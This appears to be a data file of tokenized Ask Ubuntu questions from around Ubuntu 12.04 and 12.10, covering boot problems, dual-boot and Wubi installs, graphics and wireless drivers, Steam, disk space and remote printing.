256566	ubuntu screen goes purple then black on boot	i 'm new to ubuntu , and have not much experience with computers . i installed ubuntu with wubi , all went correct , but when i 'm on the screen to chosse windows or ubuntu , and i chosse , ubuntu , the screen goes purple , with a text saying `` ubuntu '' and some dots . then it goes black , and i hear a sound . nothing else happens . i already searched a lot on how to fix this problem , but nothing works . i already tried the nomodset , but it dont works too . i have hp paviliong 6 notebook pc , windows 7 , 4gb ram , intel ( r ) core ( tm ) i5-2450m cpu @ 2.50ghz 2.50ghz . if you need some more info , say me ! thanks ! edit - i already did that thing to run on recovery mode too , it dont worked ...
256567	failed command : read fpdma queued when trying to run bitcoin-qt	i 've never been able to run bitcoin-qt on this machine ( except in testnet mode , where it works fine ) . i run it , it sits there for a while , starts downloading the blockchain and the whole computer freezes . it does not unfreeze ( i 've left it going all night ) . this time , as it was starting to freeze , i went over to tty1 ( as the gui was frozen ) to try to pull some logs out before i could n't use it anymore , and this started showing up ( before i even logged in ) : i quickly pulled out my phone and took a picture , but i 've got no idea what it means . i assume it 's a hard drive issue , but i really do n't know . again , this only happens with the bitcoin client . i 've never had the issue with anything else . not sure what else to say , feel free to ask for more details .
256570	general advice on ubuntu	i am interested in installing ubuntu as an additional operating system , but i am not sure , yet . before reaching a final decision , there are some things i need to know about ubuntu : where can i download it ? as a windows 8 user , are there any pages with instructions about the requirements and installation process ? after installing ubuntu , will i have the ability to uninstall it and if yes , how ? can the installing and uninstalling ubuntu damage my computer ?
256571	ubuntu 12.10 difficulties with first time startup on usb external hard drive	today i decided to finally try out ubuntu , so i followed the windows installation guide . i downloaded the desktop ubuntu 12.10 iso for windows , and used the pen drive linux usb installer to install ubuntu on my external hard drive . when i rebooted my pc , nothing extraordinary happened . then i went and changed my boot device order . there was two different entries including `` usb '' , so i just moved one of them to the top , and when i chose save and exit , windows just started normally again . then i went and tried moving the other entry including `` usb '' to the top , and moved the first one back . this resulted in a black screen with a line of text . the text said something including syslinux , a copyright symbol , a name ( peter h. avin or something ) and two letters . nothing else happened after waiting several minutes . i tried pressing several buttons on my keyboard , and at some point , every button started saying a `` blunk ! '' noise . waiting another fifteen minutes did n't do anything either , so i forced my pc to shut down . i tried starting up the computer again , and it said that there may be a problem with the computer , maybe caused by recent hardware changes . it gave me 2 options , to start repairing the computer , or to start windows normally . i started windows normally , as i knew that this did n't need repair . when i tried going back to change the boot device order , and saw nothing had changed since last time , i just pressed `` save and exit '' , and got the black screen with the copyright line again . i ca n't figure out what i 'm doing wrong here to be completely honest . i installed ubuntu on the right drive , and i 've tried moving both of the entries including `` usb '' to the top in the boot device order , and neither of em helped me much . so what i 'm trying to say is , i think i need help . what am i doing wrong ?
256573	install ubuntu 12.10 instead of windows 8	i have a laptop ( 4 gb ram , 500 gb hdd , intel core i3 2.4 ghz ) with 2 partitions : one for data and one for windows 8 x64 . actually , i want to install ubuntu 12.10 instead of windows 8 but keeping data partition . so , my question is : there is no matter to use ubuntu with ntfs windows partition . or i should use ext4 partition for good result ? otherwise what you think about multiple partitions for ubuntu installation ? / /home /etc ... any suggestion will be very appreciated
256585	make a new chat window open when someone contacts me	i 'd like it that when i receive a new im , empathy launches an im window ( if one is n't already open ) . is there any way to do this ? i would like this to happen for two reasons : currently , when someone im 's me , a popup appears , which i often miss . a more permanent window would be more noticeable . i do n't want to have to navigate the mail dropdown menu to get to the chat . its rather inconvenient . similarly , clicking on the empathy launcher does n't bring you to the new chat ( despite it indicating there is a new chat ) . having a new window pop up would be the most convenient way to quickly start talking .
256586	how does fontconfig deactive a font ?	does anyone know what system or user settings fontconfig changes when it deactivates fonts on your system ?
256587	how to mount dvd-rw drive/create mount point	i just get ubuntu 12.10 . so i am a newbie . i have sata hard disc with partitions - sda 1 ( swap ) sda 2 ( mount point / ) and sda 3 ( mount point /home ) . today i add another internal hard disc ( not sata ) which i plan to use only for data , and its mount point is /media/sdb1 . but after adding another hd ubuntu doesnt mount my dvd rw drive any more . i get this error : mount point media cdrom0 does not exist i tried in terminal : mount/cdrom and get this : mount : ca n't find /cdrom in etc/fstab or etc/mtab what should i do ?
256588	ubuntu 12.04 : problem editing file in recovery mode using the shell	i 'm pretty new to ubuntu/linux and i guess i messed up my /etc/fstab file . ubuntu ( 12.04 ) wo n't boot anymore . i 've found some tips on the internet on how to fix this , but i did n't manage to get them working . what i 've tried so far is to reboot and enter recovery mode shell and edit the /etc/fstab file using # nano /etc/fstab . i figured this wo n't work since the the mounted filesystem is read only . then i tried # mount -n -o remount , rw / at the shell in order to remount the filesystem as writable . but if i enter now # nano /etc/fstab i get the line bash : /usr/bin/nano : permission denied . am i missing something here ? another option i 've tried is to create a bootable usb drive ( i do n't have a cd drive ) . this did n't work . i created a bootable usb stick and it boots on other machines , but not on my laptop ( yes , i doublechecked the bios for the boot-order ) . any help would be very very much appreciated .
256591	unity has disappeared	i realise that this question has been asked before , the best example being here ( unity does n't load , no launcher , no dash appears ) . i should mention i have never used ubuntu before today , and it was working fine for a few hours before unity ( as i have learned it is called ) disappeared . my problem is identical to the op of the above thread , however none of the solutions have changed anything for me . i am using 12.10. unity and compizconfig-settings-manager are both installed . here are a list of commands suggested in the above thread that have failed : ccsm in terminal , and then checking the unity plugin is enabled : it is unity -- reset when i do this command , terminal responds with 'reset function is now deprecated' rm -rf .compiz-1 does nothing - terminal does not respond any suggestions would be greatly appreciated : )
256592	hp coolsense for ubuntu ?	i have an hp pavilion m6-1045dx running ubuntu 12.10 , but after ten minutes it feels hot . is there any hp cool-sense for ubuntu ?
256593	how to install ubuntu 12.10 on windows virtual pc ?	i 'm having trouble installing ubuntu 12.10 on a virtual pc . i 've got 12.04 to boot and mounted it onto the virtual disk but there seems to be a problem with networking . everytime i create the virtual disk for 12.10 it says its not large enough even though it is way over the required disk space . the disk is a fixed size not expanding .
256594	ubuntu windows installer installing bad files	when i loaded up the ubuntu installer for windows , i thought everything would work . a friend did it next to me today and worked fine . i copied what he did for the install but when i start up ubuntu from the os select , it gives some weird thing saying to press tab for commands . i typed boot from the given command list and it said you must load kernel . so after trying and trying to find the kernel i started back up windows and tried to uninstall ubuntu using the uninstaller . after trying the uninstaller it said that files were corrupt . i tried everything , i just want to use ubuntu .
256595	dualboot with windows 8 ? problems with partitions	i 'm trying to install ubuntu 12.10 on a sony vaio that runs windows 8 natively . after booting from cd i arrive at the point where i have to choose the partition : first of all , i come to a page where it tell me to scroll a bar to choose how much space i want to dedicate to ubuntu ( like this ( not my case ) ) ; but it shows me a partition of something like 30 gb . so i decided to go for the advanced one . the partition that i expected to use is the sda5 , type : ntfs , and 718 gb wide . under the flag `` used '' there 's the word `` unknown '' . i was not able to modify/divide that in any way . i also tried to run gparted live cd to divide it manually but i could n't boot it because of a `` safe boot error '' . what i am doing wrong ?
256596	wi-fi with hp pavilion g7	i have a hp pavilion g7 notebook computer and when i use ubuntu it starts up fine , and then when i get in i ca n't connect to wifi . i know the problem because it says something like `` disconnected by hardware switch . '' i tried to turn on my hardware switch but it does n't want to turn on ( it is a button that is supposed to shine a blue light to show that it is on , but it shines a orange light which means it is off ) .
256599	how can i change brightness on toshiba satellite c855-21m ?	i ca n't change the settings for brightness . in fact , it does n't matter if the fn keys work or not . i would like just to decrease brightness . for example , using brightness-indicator i get a message saying that no backlights were found at system . i 've tried several modifications of grub , but have had no success .
256601	why ca n't google chrome load flash plug-in ?	i ca n't get any flash content to load on chrome . when i try to watch a youtube video or something like that , it just says , `` could n't load plug-in '' .
256603	how to access more storage from ubuntu usb	i downloaded ubuntu usb onto my usb drive and ran it as my operating system , but when i try to download something to ubuntu it says i do not have enough disk space .
256606	ssh tunnel printing questions	i connect to my office pc ( my business ) via ssh from my home pc . both machines run 12.04 lts . i ran ssh into the office pc and use rdp . i have a brother mfc-7860dw ( connected to the router via ethernet ) at home and i 'd like to be able to print to it via the office pc . either when i 'm at the office , or when i 'm at home using the office pc via rdp . i also have a similar printer at the office mfc 7340 and that 's connected via usb to the office pc . i also use a different username for each pc . when i look at the printer configuration for the home printer i see : lpd : //192.168.1.10/binary_p1/brother/mfc7860 1 ) do i need to change this to ipp ? how ? i understand that i have to set up another ssh tunnel ( one that auto starts on reboot ) as follows : ssh -r 127.0.0.1:8631:127.0.0.1:631 ssh.office.com ( i do n't understand this ) 2 ) do i need to install the mfc-7860dw drivers on the office pc , or is it sufficient for the drivers to be installed on the home pc ? 3 ) do i run the ssh -r from the home pc terminal , or the office pc ? 4 ) i understand that the port 8631 is to be used for the office pc , but do i need to tell the office router/modem to forward this port , or is this all safely handled by the ssh -r ? 5 ) in other words , what steps to i need to complete to ensure i can print remotely ? thanks .
256611	windows button on keyboard	when i had windows my windows button worked like if you was in a game and needed to read somting or something else not in game you could press the windows button , and you did not close the whole game , in ubuntu when you take a screenshot or press the windows button , i ca n't get in game again . i have to restart the game , is there anny possibilty to change it , so it works just the same as in windows ? i like ubuntu , wont change .
256617	canon printer lbp6020	could anyone confirm me if this printer is supported and it is working under ubuntu ( any version ) ? on their website it says it does n't support linux ( is missing from os list i mean ) .
256618	where can i find the update manager in ubuntu 12.10 ?	i do not have an update manager , how can i reinstall it ? i clicked the gear and searched `` update manager '' and nothing comes up . how can i fix this ? thanks in advance .
256619	df shows all space taken , but du does n't add up	i 'm having a problem with ubuntu 12.04 lts . this is the second time i 've encountered this problem in the last 3 weeks . the first time is described in this closed question on stackoverflow . the tl ; dr version is i managed to use all the inodes on a 450g ext4 system compiling and building the android stack less than 20 times . i thought i was solving the problem by reformatting the disk as xfs so the inode storage could grow . this morning after doing a build overnight , i 'm down to less than 1gb of free space . there is nothing on this machine other than what is needed to build android . i 've done 5 total builds on the platform sources . the build creates a bunch of files , then i delete them shortly after with make clean . i 'm not really less than 1gb but the tools are reporting it that way . i deleted a bunch of temporary files and had about 40gb `` freed '' . a couple hours later , just idling , i was back to less than 1gb free . running ubuntu from a flash drive returns the following for the partition ... $ df filesystem 1k-blocks used available use % mounted on /dev/sda5 468521456 468255460 265996 100 % /media/f71c77eb-b4cc- $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda5 1691760 624214 1067546 37 % /media/f71c77eb-b4cc- $ df -h filesystem size used avail use % mounted on /dev/sda5 447g 447g 260m 100 % /media/f71c77eb-b4cc- here 's is the evidence that something is amiss . when i run du ( with and without -- apparent-size ) or the visual disk usage analyzer , i show that i 'm really only using about 35gb or so . 98.7 % of the used space is in /home/eric , but du does n't add up to that . the discrepancy is between /home/eric and /home/eric/android i 've read through the relevant questions here and on so and they usually suggest it 's deleted files held by open processes . i rebooted into a flash drive to run this test , so it should n't be open files . fwiw , /tmp is empty . is there a tool i can install on a flash drive to recover the 'lost ' space ? i can try to free up memory on the system and run it there , but i 'm assuming it 's better to do this from a flash drive . should i be configuring this system in a different way ? i would rather not do another wipe and install , but i need a sustainable android build system . followup - i had to nuke the installation last week and re-installed 12.04 in order to get work done . as i go through android builds again this week , i will keep a watchful eye over the disk usage and give information here as i learn more . thanks
256621	problem installing tor on ubuntu 12.10	i 'm trying to install tor on ubuntu 12.10 , i followed the instruction on upubuntu , but when i paste sudo apt-get install tor-browser ( the third line ) in my terminal , this is what i see : lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto e : impossibile trovare il pacchetto tor-browser that means that it read the packages ( first line ) , it developed the tree of dependences ( second line ) , it read the information on the status but it ca n't find the package of tor browser . any suggestion ? thanks in advance for the help ! : )
256622	12.04 nvidia driver activated but not in use	i read multiple post and i did n't find and answer . how can i get my nvidia drivers working ? here is some info about my system : linux *****-pc 3.2.0-37-generic # 58-ubuntu smp thu jan 24 15:28:57 utc 2013 i686 athlon i386 gnu/linux distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6100 nforce 400 ] ( rev a2 ) *-display descripción : vga compatible controller producto : c61 [ geforce 6100 nforce 400 ] fabricante : nvidia corporation id físico : d información del bus : pci @ 0000:00:0d.0 versión : a2 anchura : 64 bits reloj : 66mhz capacidades : pm msi vga_controller bus_master cap_list rom configuración : driver=nvidia latency=0 recursos : irq:22 memoria : fb000000-fbffffff memoria : e0000000-efffffff memoria : fc000000-fcffffff memoria:80000000-8001ffff section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 6100 nforce 400 '' endsection
256624	how do i get the bandluxe c505 working in ubuntu ?	i just signed up for a wisp in my area and i ca n't get the usb dongle to work with ubuntu . the dongle is a bandrich bandluxe c505 lte modem . i 'm currently running ubuntu 12.10 and the modem appears to be recognized but it never ends up connecting . i entered all of the correct apn information into the network manager . is there something i need to do differently ? let me know what you all think . edit : oh , i forgot to mention that the lte modem is being recognized as a mobile broadband device and an ethernet device at the same time .
256628	steam fatal error steam needs to be online to update , but was set to offline movies	i tried to install steam but is impossible to run it i get this when i try to run it steam running steam on ubuntu 12.10 64-bit steam_runtime is enabled automatically ilocalize : :addfile ( ) failed to load file `` public/steambootstrapper_english.txt '' . installing breakpad exception handler for appid ( steam ) /version ( 0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) steamupdater : error : download failed : http error 0steamupdater : error : steam needs to be online to update . please confirm your network connection and try again . installing bootstrap /home/elin3t/.local/share/steam/bootstrap.tar.xz running steam on ubuntu 12.10 64-bit steam_runtime has been set by the user to : /home/elin3t/.local/share/steam/ubuntu12_32/steam-runtime ilocalize : :addfile ( ) failed to load file `` public/steambootstrapper_english.txt '' . installing breakpad exception handler for appid ( steam ) /version ( 0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) installing breakpad exception handler for appid ( steam ) /version ( 1.0_client ) steamupdater : error : download failed : http error 0 steamupdater : error : steam needs to be online to update . please confirm your network connection and try again . and this is my hardware vga lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710 [ radeon hd 4350 ] and this my distro version lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal thanks if some can help me ! ! i tried the forum solution but i didnt found the registry.vdf file to change the lines
256630	spotify installed , run error	terminal says : ( spotify:20514 ) : gtk-critical ** : gtk_box_pack : assertion `gtk_is_box ( box ) ' failed 22:11:19.149 i [ ap_connection.cpp:1767 ] connecting to ap fonda.lon.spotify.com:4070 22:11:19.155 i [ apprunner.cpp:55 ] onboarding-popup : not installed 22:11:19.155 i [ apprunner.cpp:252 ] onboarding-popup : installing app 22:11:19.155 i [ apprunner.cpp:273 ] onboarding-popup ( version 0.0.0 ) : metadata query started 22:11:19.156 i [ appmanager.cpp:206 ] creating instance of the application install . ( spotify:20514 ) : glib-gobject-warning ** : invalid cast from `gtkfixed ' to `gtkbox' ( spotify:20514 ) : gtk-critical ** : gtk_box_pack : assertion `gtk_is_box ( box ) ' failed 22:11:19.173 i [ ap_connection.cpp:1234 ] connected to ap : 78.31.8.102:4070 22:11:19.499 i [ apprunner.cpp:273 ] onboarding-popup ( version 0.0.0 ) : metadata query complete 22:11:19.499 i [ apprunner.cpp:273 ] onboarding-popup ( version 0.0.0 ) : download started 22:11:19.526 i [ mainview.cpp:7250 ] load complete ( 0 ) url : sp : //faa645cea6e98f854b789c7a6f4beeef6d3ca53c.home/index.html 22:11:19.604 i [ upnp.cpp:508 ] 192.168.1.1 : got external ip 0xd56a4c28 22:11:19.646 e [ file_system_monitor_linux.cpp:500 ] filesystemmonitorlinux ( ) failed [ inotify_init ( ) ] segmentation fault ( core dumped ) what 's wrong ? ubuntu 12.10 32bit . spotify installed without any problems , when i try to run spotify , problem starts .
256632	how to get back windows 8 after 12.10 installation	the uefi thing screwed my head a bit while trying to install ubuntu 12.10 in dell 7520 , i made separate partition in windows 8 , installed ubuntu via liveusb it went well , but ubuntu did n't load . so , i hit the ubuntu install again , it asked me to erase previous ubuntu , i said yes , now the ubuntu 12.10 works perfectly . i used boot-repair to repair the grub as suggested in some answers here , and when i reboot , there was no option for windows 8 . i booted to ubuntu to check the ubuntu have used whole 1 tb ( total space ) . that means i deleted windows ? if so , any way to get the setup back ? i do n't have repair disk , nor dvd . win8 came pre-installed . edit : for the ones who are looking for such solutions , there is no way to get it back , at-least in my kind of situation . i again installed the windows from dvd ( i got it from dell customer center , and while purchasing this laptop i had one month of premium support , which made things easier ) . i installed windows8 with dvd and not selecting uefi and i used g-parted from liveusb to create partitions , hence , installed ubuntu 12.10 in other partition via liveusb .
256634	ubuntu cant open .deb files - how can i correct this ?	i 've downloaded ubuntu because my windows 7 kept showing a black screen with a cursor on it and and would n't boot up properly . so i thought that maybe linux would work . it worked perfectly but i ca n't open .deb files , which should be made for ubuntu . also , if i try to download steam 64-bit , it tells me an error and ca n't download it . i do n't know why since it 's made for ubuntu .
256636	`` /proc/partitions not found '' error is showing up	i am configuring a webserver in ubuntu 10.04 . more particularly iâ am installing datastax opscenter . unfortunately , the logs are spammed with this error : error [ pool-3-thread-7 ] 2013-02-15 22:04:34,533 long os-stats collector failed : process failed : cat /proc/partitions exit val : 1 output : cat : /proc/partitions : no such file or directory error [ pool-5-thread-3 ] 2013-02-15 22:04:56,846 error getting devices and partitions # < ioexception java.io.ioexception : process failed : cat /proc/partitions exit val : 1 output : cat : /proc/partitions : no such file or directory > why do i get cat : /proc/partitions : no such file or directory ? i really doubt that the problem is with the application i am using , because if i run this command from command line cat /proc/partitions i still get no such file or directory and from what i have found in some forums that directory should be created when the os is starting up , i could be wrong but that 's as far i got .
256637	how do i install ati drivers and keep them up-to-date ?	i am using ubuntu 12.10 64-bit and my graphics card is ati radeon hd 7770 . so for example i want to install ati drivers , which i can simply find them on amd support page , which will give me the `` amd catalystâ˘ 13.1 proprietary linux x86 display driver '' , fine i can download it though amd page . but there 's some software that i can install from the software center ( i actually , did n't check if amd catalyst was there , but i do n't thinkâś ) is the same to download and install the software from their original site other than downloading it though the software center ? if i install it though their site , will the program still auto-update when there 's a new update for it ?
256640	ubuntu stuck on boot screen with a radeon hd 5570	with additional drivers installed and a general updated : - on boot , stuck at purple start up screen with five orange dots and ubuntu logo . - hard drive light turns off - ctrl alt f1 -f6 are all unresponsive . - ctrl alt del is the only repsonsive command ( restart ) i then attempted without additional drivers installed . after general update and reboot : - screen goes idle during boot - ctrl alt f1 -f6 are all unresponsive - ctrl alt del is the only repsonsive command ( restart ) upon being pressed , the screen stops being idle for a second or so in which i see the shutting down screen then it restarts the computer . if i boot in safety mode i can get into a terminal based version with no gui i am currently trying 12.10 instead to see if it works . it does work , except it does n't run steam , but it actually can boot more than once , now i just have to pick which faulty version of ubuntu i go with , so which is easier to fix computer specs : dell optiplex 755 core2duo 2.33 ghz 5gb ddr2 ram 3 sata hard drives ( direct connection to motherboard ) ( unused ) wirelesscard in pci slot ati radeon hd 5570 pci slot 2
256641	firefox wo n't start from launch menu - hangs on futex_wait_private	( 12.10 , both kde and xfce4 ) for some reason , firefox has stopped working when launched from the window manager 's launcher . the program runs , but nothing happens . if i try again , i get an error popup that tells me another instance of firefox is already running , which is true according to ps . if i strace the process , it 's stuck on a futex_wait_private system call . does anybody know how to make that stop happening ? ( i found an old blog post that claimed it has something to do with assistive technologies being enabled , but on my system they 're not as far as i can tell . ) oh , and i can start firefox successfully by launching it from an xterm window .
256649	wubi ( 32 bit iso ) freezes on `` almost finished copying files ''	basically what it says on the tin . after accidentally installing the 64 bit version , i uninstalled it and tried to install the 32 bit version , but the installation freezes . i 've seen some answers saying that you have to change your format to fat32 , but to be honest i 'm a complete newbie and do n't know how to do that .
256652	ext4 to btrfs conversion : how long can it take ? space requirements ?	i started btrfs-convert for my ext4 partitioned hdd . i did a fsck first which was fine . so since it is running over 4 hours now ( 1 . ) i wonder if it will ever finish ? i read multiple articles ( quickly ) about the conversion but none stated a space requirement . but i guess there is some considering this article : https : //oss.oracle.com/projects/btrfs/dist/documentation/btrfs-converter.html so my hdd was using 99.0 % of 1.82tb before i started . ( 2 . ) if it can not finish is it save to cancel ( ctrl+c ) the prozess ? iotop indicates still that btrfs-convert is reading with ~40mb/s from my hdd and top shows that one cpu core is fully loaded by btrfs-convert . ( 3 . ) what would be the wisest decision now ? update : meanwhile the conversion process has finished . it took almost 3 days . i must add that in between speeds dropped to ~0-10mb/s but 100 % i/o load and cpu usage dropped accordingly down . this morning ( after over 2 days running ) the conversion process had only ~9h cpu time . all in all everything seems fine .
256653	ca n't chroot to recover ubuntu 64 bits	i was trying to get steam for linux to work on my ubuntu 10.04 lts 64 bits system . i installed these three ( some 32 bit ) packages : http : //packages.ubuntu.com/quantal/libc-bin http : //packages.ubuntu.com/quantal/libc6 http : //packages.ubuntu.com/precise/libc6-i386 and now my computer panics on boot . i tried to chroot from an ubuntu 10.04 live cd using these commands : mount /dev/sda1 /media/x mount -- bind /sys /media/x/sys mount -- bind /proc /media/x/proc mount -- bind /dev /media/x/dev chroot /media/x but i get this error : chroot : can not run command `/bin/bash ' : no such file or directory but everything is there . my entire system is on /media/x i also tried using : chroot /media/x /bin/bash please help ! !
256656	wireless not working in spite of following every locatable work-around	i have a broadcom 802.11 wireless pci card in my laptop , chipset 4318 . i have followed all the instructions to replace the delivered driver with ndiswrapper with the appropriate windows driver bcmwl5 . i 've just loaded ubuntu so the kernel is 3.5.0-17 . i had to use ndiswrapper-1.58rc1 to circumvent a problem with modprobe but now when i follow all the steps given for install ndiswrapper i get no errors but still no luck . driver b43-pci-bridge is listed in /etc/modprobe.d/blacklist.conf but it is still the driver associated with the device according to lshw and i ca n't find any reference as to where that association is being made . when ubuntu boots the wireless assistant button on the keyboard is not lit and i ca n't find any combination of keys or command to get it to light , i assume because the installed driver is wrong . so in short ubuntu help - wireless trouble shooting has used up the better part of 3 days but still not produced the desired outcome . any ideas ? i 'm sure that if i could find out where that driver is being associated with the device i could make ndiswrapper work instead .
256660	not able to upgrade to 12.10 from 12.04	i want to upgrade to ubuntu 12.10 from 12.04 . but i am not able to do it . i do n't see upgrade tab in download manager . these are the steps i followed : open update manager click on settings click on updates tab notify me of a new version : `` for any new version '' . after doing this , i even restarted the machine , still i do n't see upgrade tab in download manager . plz help .
256665	ubuntu 12.4 lts dualboot with windows xp not working	since i loaded ubuntu 12.4 lts i can no longer get into windows xp . when i boot the computer windows xp goes through its sequence until it shows boot from cd/dvd then the screen comes up to chose ubuntu or windows xp but the arrow keys do not respnd and ubuntu opens . also i am not sure if i need the 320 updates the update manager says are available . they will not install anyway . i am a rookie when it comes to computers . what are my options ? i would like to have a dual boot computer with ubuntu and windows xp . any help would be appreciated .
256668	when i try to click on steam_latest.deb nothing happens ?	i downloaded the file and when i click it nothing happens ?
256673	steam destroys my ubuntu	i had to install ubuntu 4 times to realise what was happening . the problem is basically that following this few steps ubuntu gets frozen on loading screen ( before login ) . install ubuntu 12.04.2 update software install steam from steampowered.com after this i can perfectly download and play any available game , but the next time i reboot my system it will not load = ( anyone with the same problem or some suggestion ? thanks
256676	ubuntu 12.10 running unbearably slow	cpu : amd 1100t video card : radeon hd 7870 ram : 8gb corsair hdd : western digital 256bg 7200 rpm mobo : gigabyte ga-890gpa rev 2.1 another note is that while idling cpu is roughly between 30-50 % usage fresh install of ubuntu 12.10 .
256688	qt 5.0.1 for ubuntu	so i 've asked before , but the answer was that i should install ubuntu phone sdk , which , does n't seem to be the best way . i 've looked on software center but it 's not there . downloading though the qt site is the only option i 've got ? i want to both develop and run qt applications . i do n't want to develop for ubuntu phone .
256693	usb freeze on boot	using universal usb installer 1.9.2.4 on windows 7 with a seagate usb 500 gig harddrive . 120 gigs were partitioned off and formatted to fat32 with the installer . basically i downloaded the program and ran it normally . downloaded the iso also from the program . ran everything normally . all files were extracted fine and formatted correctly . i reboot my computer , hold esc and choose my seagate usb harddrive to boot from . and then ... .nothing . not even a progress bar of any sort it just freezes . as in , i 've left it for 15-20 mins and still nothing . i 'm sure i 've probably missed something but i have no idea . any insight would be great .
256696	unable to start ubuntu from vmware	i installed ubuntu on vmware but when i open ubuntu all i get is this : i 'm trying to run ubuntu 12.10
256706	secure shared memory	in my ubuntu deployment script i have written a function to secure shared memory . for a web server it 's important to secure the shared memory to tighten up security . below you can find the code : echo `` tmpfs /dev/shm tmpfs tdefaults , noexec , nosuid 0 0 '' > > /etc/fstab when i reboot the web server it gets stuck . i ca n't see where it goes wrong . do you have an idea , please let me know .
256707	remote access to owncloud server	i 'm currently trying to setup my own own-cloud server , and i 've got it fully installed , configured , and accessible from within my own local network . i can not figure out how to access it from the outside . so far i 've : successfully setup port-forwarding on my local router . i 've done so via 'single port forwarding ' and 'port range forwarding' ports 80 , 443 , 3306 ( apache-full and mysql ) successfully obtained my external ip address . i 've also tested this magic number from within the network at # insertiphere/owncloud and it did work . successfully setup the server using sqlite successfully setup the server using mysql created the following exceptions in my firewall : allow in port 80 ( apache full ) allow in port 443 ( apache full ) allow in port 3306 ( mysql ) tried connecting from several different remote networks , as to troubleshoot something on their end as far as trying to access it , i 'm doing so through google-chrome and mozilla firefox trying to reach the server through # insertiphere/owncloud using the above public ip address . so what have i missed , and how do i access my server from outside ? thanks in advance for your help and time , and i apologize in advance for what will probably result in my noobish mistake in networking . i 've looked at the official documentation . and also this question here .
256710	macbook pro 9,2 grub rescue prompt refit ubuntu 12.04	i have dual-booted ubuntu 12.04 on my macbook pro 9,2 without any problems after i have managed to boot into ubuntu . however , to do that i must use super grub disk . i have a dual boot system , so i thought it would be inadvisable to install grub directly to /dev/sda , and thus installed it to /dev/sda6 ( i have a shared partition in between mac and ubuntu to transfer files ) . i am using refit , and whenever i try to boot into ubuntu from refit it drops me to the grub rescue prompt . i know that my grub.cfg is fine , because i can use it from super grub . also , before it drops me to the grub rescue prompt , it tells me that it ca n't find the partition ( i do n't know which one ) . i have synced my partition tables using refit , and updated grub with update-grub , but to no avail . does anyone have any ideas for what could be wrong and how i could fix it ?
256712	ubuntu 12.04 wo n't mount samsung se-218bb	i ca n't seem to mount the drive even though samsung advertises it as being linux compatible when switching it over to av mode ( by ejecting the tray and holding the eject button until the led comes on ) i have tried inserting a cd into the drive but it acts as if it is going to start reading the disk and then suddenly stops spinning after about 1 second and repeats this process . i checked the disk utility app and the drive will show up along with the other devices like the hard drive for only a second or two and then disappear and repeat this as well . i have tested two different se-218bbs and both have this same strange behavior . all of my other usb devices work fine when plugged in . the standard mode was read without any problems when i booted windows 7 . i 'm running ubuntu 12.04 on a toshiba satellite c655d . thanks for any help .
256716	why ubuntu ask me for for root password while upgrading ?	i frequently upgrade the desktop of my daughter ( using ubuntu 12.04.1 ) through the official processes , but in the latest attempt the computer is asking for a root ( or super user ) password . in the past i always used the administrator password . this one is now no longer accepted . ca n't also not unlock the administrators account in users accounts . every that used the computer claims not to have entered a root password . nobody knows another password than the administrator password ? something must have gone wrong somewhere . how do i disable the root password ? i have tried some advices from this site , such as sudo passwd -dl root , but the computer replies that the administrator is not in the sudoers file after entering the administrators password . what can i do to remove or get around the root password ?
256717	mac osx lion wo n't read shared drives other than public	i 'm using ubuntu 12.04 to run a box with a handful of hard drives and a logitech media server driving a squeezebox . i 'm accessing with a windows vista laptop and a macbook with osx 10.7.5 . most of this system is working fine , but the macbook is being uncooperative , it will access the public folder ( and music/video folders ) but not other shared folders . i have a raid and a single drive with shared folders , both accessible by the windows laptop . the raid is configured to share using nautilus , the single drive by editing the smb.conf file , they are different because i was trying to figure out what was n't working for the mac . when i find the server in finder on the mac , it displays all the shared folders , but when i try to access anything other than the public one , i 'm told it can not be accessed because the item is no longer available . i know this is a mac question , and i 'm posting on a mac forum too , but if any of ya 'll have an idea of what i can do differently , please , i 'm about ready to apply some blunt force to this thing .
256720	installing piklab	i have tried to install piklab into my ubuntu 12.04 lts 32-bit , and i tried to use this and this method . none of them really worked . during cmake . , my shell displays me lots of messages , but i think this is the main one : -- could not find ncurses ( missing ncurses_library ncurses_include_dir ) what can i do to solve this situation ? i 've tried to install the most recent version , got from sourceforge .
256723	i am unable to see contents on floppy disk .	i am able to click on detect media and the light comes on for my floppy drive . all files on the disk are not visible . there is another post that says : via the menu option system -- > administration -- > users and groups click on advanced settings ( bottom right - under your account that is shown - there may be more than one user shown ) click on user privileges and check the box that says `` use floppy drives '' i can not figure out how to get to this screen as nothing such as administratin - users and groups is found . where is this located at ?
256725	system running in low graphics mode , dont know how to fix ?	i keep getting this error when i installed ubuntu 12.04 lts on virtualbox , with 2gb of ram and 20gb of hard drive space . i am new to linux so i do n't know what is wrong , and most of the answers to similar questions are asked by people that already know all of linux . how do i fix this ?
256726	my internet is suddenly slow	im running ubuntu 12.10 and it works like a charm ... but one problem , when i updated my software everything seemed ok until i noticed that my internet speed very slow . i had about 5-6 mbps but it suddenly changed to 130 kbps max speed no higher , so to see if it was my internet i booted up windows to see my speed on there and it went right back to 5-6 mbps . rebooted to ubuntu and back to 130 kbps ? ? ? can anyone help me with this . it took 2 days to download team fortress , when it usually takes only about 54-6 hours ... please help .
